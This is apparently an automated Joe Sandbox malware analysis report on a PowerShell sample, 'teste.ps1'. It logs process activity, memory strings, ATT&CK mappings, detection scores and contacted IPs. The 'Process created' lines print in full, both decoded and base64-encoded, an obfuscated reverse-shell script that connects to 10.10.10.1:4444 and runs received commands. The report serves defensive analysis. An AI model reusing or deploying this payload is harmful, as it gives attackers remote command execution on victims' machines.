Source: C:\Windows\System32\svchost.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.1374203986.00000000079B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb9; source: powershell.exe, 00000002.00000002.1369870772.000000000361F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.1369870772.000000000361F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.pdb? source: powershell.exe, 00000002.00000002.1374203986.00000000079B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5&:HnG source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_05183AD9 push ebx; retf 2_2_05183ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07CB51B0 push edx; retf 2_2_07CB52B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07CB5050 push ecx; retf 2_2_07CB519E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07CB0013 push ebx; retf 2_2_07CB0016
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1684
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5908
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8144 | Thread sleep count: 3869 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152 | Thread sleep count: 5908 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180 | Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7492 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAM
Source: svchost.exe, 00000003.00000002.2363600034.000001779062B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: svchost.exe, 00000003.00000002.2364464427.0000017795C57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: Base64 decoded $str = "TcP"+"C"+"li"+"e"+"nt";$reversed = -join ($str[-1..-($str.Length)]);$PJ = @("54", "43", "50", "43", "6C", "69", "65", "6E", "74");$TChar = $PJ | ForEach-Object { [char][convert]::ToInt32($_, 16) };$PJChar = -join $TChar;;$RtRjmMlY = NeW-oB''JeCT ('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets.TCPcliEnt')('10.10.10.1',4444);$EnBtywtgh = $RtRjmMlY.('Get'+'Stream')();[byte[]]$PJChar = 0..65535|%{0};while(($i = $EnBtywtgh.ReAd($PJChar, 0, $PJChar.LeNgTh)) -ne 0){;$6a0b5efe = (NeW-oB''JeCT -TypENAme S'y's't'e'm.T'e'x't.'A'S'C'I'IE'n'c'o'd'i'n'g).('Ge'+'tStRinG')($PJChar,0, $i);$3dbfe2ebffe072727949d7cecc51573b = (iex ". { $6a0b5efe } 2>&1" | Ou''t-Str''ing );$J=$O=$K=$E=$R=$P=$W=$R = ${3dbfe2ebffe072727949d7cecc51573b} + '[94mJokerShell[39m ' + (pwd).Path + '> ';$s = ("{0}{1}{3}{2}"-f "se''nd","by","e","t"); $s = ([text.encoding]::ASCii).GetBYTeS($R);$EnBtywtgh.Write($s,0,$s.Length);$EnBtywtgh.Flush()};$RtRjmMlY.Close()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1A
CcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabzahqacgagad0aiaaiafqaywbqaciakwaiaemaigaraciababpaciakwaiaguaigaraciabgb0aciaowakahiazqb2aguacgbzaguazaagad0aiaatagoabwbpag4aiaaoacqacwb0ahiawwatadealgauac0akaakahmadabyac4atablag4azwb0aggakqbdackaowakacqauabkacaapqagaeaakaaiaduanaaiacwaiaaiadqamwaiacwaiaaiaduamaaiacwaiaaiadqamwaiacwaiaaiadyaqwaiacwaiaaiadyaoqaiacwaiaaiadyanqaiacwaiaaiadyarqaiacwaiaaiadcanaaiackaowakacqavabdaggayqbyacaapqagacqauabkacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiabbagmaaabhahiaxqbbagmabwbuahyazqbyahqaxqa6adoavabvaekabgb0admamgaoacqaxwasacaamqa2ackaiab9adsacgakafaasgbdaggayqbyacaapqagac0aagbvagkabgagacqavabdaggayqbyadsacga7acqaugb0afiaagbtae0ababzacaapqagae4azqbxac0abwbcaccajwbkaguaqwbuacaakaanafmajwaraccaeqanacsajwbzaccakwanahqajwaraccazqanacsajwbtaccakwanac4ajwaraccatganacsajwblaccakwanahqajwaraccalganacsajwbtaccakwanag8aywbraguadabzac4avabdafaaywbsagkarqbuahqajwapacgajwaxadaalgaxadaalgaxadaalgaxaccalaa0adqanaa0ackaowakacqarqbuaeiadab5ahcadabnaggaiaa9acaajabsahqaugbqag0atqbsafkalgaoaccarwblahqajwaraccauwb0ahiazqbhag0ajwapacgakqa7afsaygb5ahqazqbbaf0axqakafaasgbdaggayqbyacaapqagadaalgauadyanqa1admanqb8acuaewawah0aowakahcaaabpagwazqaoacgajabpacaapqagacqarqbuaeiadab5ahcadabnaggalgbsaguaqqbkacgajabqaeoaqwboageacgasacaamaasacaajabqaeoaqwboageacgauaewazqboagcavaboackakqagac0abgblacaamaapahsaowakacqangbhadaayga1aguazgblacaapqagacgatgblafcalqbvaeiajwanaeoazqbdafqaiaatafqaeqbwaeuatgbbag0azqagafmajwb5accacwanahqajwblaccabqauafqajwblaccaeaanahqalganaeeajwbtaccaqwanaekajwbjaeuajwbuaccaywanag8ajwbkaccaaqanag4ajwbnackalgaoaccarwblaccakwanahqauwb0afiaaqbuaecajwapacgajabqaeoaqwboageacgasadaalaagacqaaqapadsacgakadmazabiagyazqayaguaygbmagyazqawadcamga3adianwa5adqaoqbkadcaywblagmaywa1adeanqa3admaygagad0aiaaoagkazqb4acaaigauacaaewagacaajaa2ageamabiaduazqbmaguaiaagah0aiaayad4ajgaxaciaiab8acaatwb1a
ccajwb0ac0auwb0ahiajwanagkabgbnacaakqa7aaoajabkad0ajabpad0ajablad0ajabfad0ajabsad0ajabqad0ajabxad0ajabsacaapqagacqaewazagqaygbmaguamgblagiazgbmaguamaa3adianwayadcaoqa0adkazaa3agmazqbjagmanqaxaduanwazagiafqagacsaiaanabsawwa5adqabqbkag8aawblahiauwboaguababsabsawwazadkabqagaccaiaaracaakabwahcazaapac4auabhahqaaaagacsaiaanad4aiaanadsacgakahmaiaa9acaakaaiahsamab9ahsamqb9ahsamwb9ahsamgb9acialqbmacaaigbzaguajwanag4azaaiacwaigbiahkaigasaciazqaiacwaigb0aciakqa7acaajabzacaapqagacgawwb0aguaeab0ac4azqbuagmabwbkagkabgbnaf0aoga6aeeauwbdagkaaqapac4arwblahqaqgbzafqazqbtacgajabsackaowakacqarqbuaeiadab5ahcadabnaggalgbxahiaaqb0aguakaakahmalaawacwajabzac4atablag4azwb0aggakqa7acqarqbuaeiadab5ahcadabnaggalgbgagwadqbzaggakaapah0aowakafiadabsagoabqbnagwawqauaemababvahmazqaoackacga=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
MITRE ATT&CK matrix (tactic: techniques; numbers as shown in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; 2 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 Browser Extensions; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 21 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1675108 | Sample: teste.ps1 | Startdate: 26/04/2025 | Architecture: WINDOWS | Score: 68
Sample-level signatures: Sigma detected: Suspicious PowerShell Encoded Command Patterns; AI detected malicious Powershell script; Joe Sandbox ML detected suspicious sample; Sigma detected: Suspicious Encoded PowerShell Command Line
Processes started from the sample: powershell.exe 11; svchost.exe 1 1
  powershell.exe: signatures: Malicious encrypted Powershell command line found; Encrypted powershell cmdline option found; started: powershell.exe 16; conhost.exe
  svchost.exe: DNS/IP: 127.0.0.1 unknown unknown
  powershell.exe (child of powershell.exe): DNS/IP: 10.10.10.1, 4444 unknown unknown

Antivirus detection (Source | Detection | Scanner):
teste.ps1 | 5% | Virustotal
teste.ps1 | 3% | ReversingLabs
SAMPLE | 100% | Joe Sandbox ML
No Antivirus matches


No contacted domains info
Contacted URLs (Name | Source | Malicious | Reputation; the Antivirus Detection column is empty for every row):
https://g.live.com/odclientsettings/Prod.C: | edb.log.3.dr | false | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp | false | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.3.dr | false | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmp | false | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | false | high
https://aka.ms/pscore6lB | powershell.exe, 00000000.00000002.1377093945.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1377093945.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.microsoft | powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/License | powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.ver) | svchost.exe, 00000003.00000002.2364387027.0000017795C00000.00000004.00000020.00020000.00000000.sdmp | false | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.3.dr | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1377093945.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmp | false | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmp | false | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious; only the IP column is filled):
10.10.10.1
127.0.0.1
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1675108
                                    Start date and time:2025-04-26 21:04:29 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 23s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:teste.ps1
                                    Detection:MAL
                                    Classification:mal68.bank.evad.winPS1@5/12@0/2
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 21
                                    • Number of non-executed functions: 5
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 69.192.44.226, 131.253.33.254, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7928 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 8100 because it is empty
• Not all processes were analyzed, report is missing behavior information
Time | Type | Description
15:05:23 | API Interceptor | 45x Sleep call for process: powershell.exe modified
15:05:28 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                    No context
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):1.3073494710058864
                                    Encrypted:false
                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrs:KooCEYhgYEL0In
